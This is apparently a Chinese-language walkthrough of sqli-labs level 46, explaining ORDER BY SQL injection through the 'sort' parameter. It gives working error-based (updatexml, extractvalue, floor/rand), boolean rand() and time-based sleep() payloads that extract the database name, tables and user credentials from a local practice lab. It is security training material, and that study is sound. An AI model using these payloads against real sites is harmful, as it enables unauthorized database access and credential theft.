通过盲注脚本复习sqllabs第46关 order by 注入

通过盲注脚本复习sqllabs第46关 order by 注入

less-46关

此关及之后都是order by语句与limit语句的相关注入，对于一些会显示表格的网站，他们的 URL 中通常都会有sort和limit两个参数。一进入46关页面就提示我们使用 sort ，如下图所示：

尝试使用 ?sort=1 发现：

尝试使用 ?sort=2 发现：

尝试使用 ?sort=3发现：

我们发现当我们使用 sort=1 时 表格以第一列进行排列，sort=2 时 表格以第二列进行排列， sort=3 时 表格以第三列进行排序。我们想到了order by 函数 ，猜测可能是与 order by 函数相关的注入。

源码

由此可断定本关通过sort参数接收需要排序的列的序号（从1开始），MySQL 查询语句为：SELECT * FROM users ORDER BY $id

尝试sort=1 asc和sort=1 desc，分别显示升序和降序的表格，说明此处是注入点，即注入点在order by后的参数中，而order by不同于在where后的注入，不能使用union等进行注入。

何为order by注入以及如何进行order by注入，这就需要了解一下 MySQL 官方的select文档：MySQL :: MySQL 8.0 Reference Manual :: 13.2.10 SELECT Statement

什么是order by？

在MySQL支持使用ORDER BY语句对查询结果集进行排序处理，使用ORDER BY语句不仅支持对单列数据的排序，还支持对数据表中多列数据的排序。语法格式如下：

select * from 表名 order by 列名(或者数字) asc；升序(默认升序) 
select * from 表名 order by 列名(或者数字) desc；降序

mysql中order by也多个字段自定义排序，通过逗号隔开，但只能在数字之间进行自定义排序，若选择字符类型则会根据第一个列名的排序规则进行排序。语法格式如下：

select * from 表名 order by 列名(或者数字) asc；升序(默认升序) ，列名(或者数字) desc；降序(默认升序)

而order by注入就是通过可控制的位置在order by子句后，如下order参数可控：
select * from goods order by $_GET['order']

order by注入

利用 order by 后的一些参数进行注入

order by 注入是指其后面的参数是可控的，

order by 不同于我们在 where 后的注入点，不能使用 union 等注入，其后可以跟接 报错注入 或者 时间盲注。

判断库名：

?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

判断表名：

?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

判断列名：

?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

查询数据：

?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

(1)、order by 后的数字可以作为一个注入点。也就是构造 order by 后的一个语句，让该语句执行结果为一个数，我们尝试http://127.0.0.1/sqli-labs/Less-46/?sort=right(version(),1)没有报错，但是 right 换成 left 都一样，说明数字没有起作用，我们考虑布尔类型。此时我们可以用报错注入和延时注入。此处可以直接构造 ?sort= 后面的一个参数。此时，我们可以有三种形式，

1.直接添加注入语句，?sort=(select ******)
2.利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)

例如：rand(ture)和 rand(false)的结果是不一样的

3.sql语句可以利用报错注入和延时注入的方式，语句可以灵活的构造。

报错注入

?sort=(select%20count(*)%20from%20information_schema.co
lumns%20group%20by%20concat(0x3a,0x3a,(select%20user()),0x3a,0x3a,floor(rand()*2)))

http://127.0.0.1/sqli-labs-master/less-46/?sort=rand(ascii(left(database(),1))=115)

http://127.0.0.1/sqli-labs-master/less-46/?sort=rand(ascii(left(database(),1))=116)

从上述两个图的结果，对比 rand(ture) 和 rand(false) 的结果，可以看出报错注入是成功的。

（2）procedure analyse 参数后注入 利用 procedure analyse 参数，可以执行报错注入。同时，在 procedure analyse 和 order by 之间可以存在 limit 参数，在实际应用中，往往也可能会存在 limit 后的注入，可以利用 procedure analyse 进行注入。

?sort=1%20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)

通过暴库

?sort=(extractvalue(1,concat(0x7e,(select database()),0x7e)))#

时间注入

?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)

?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)

?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)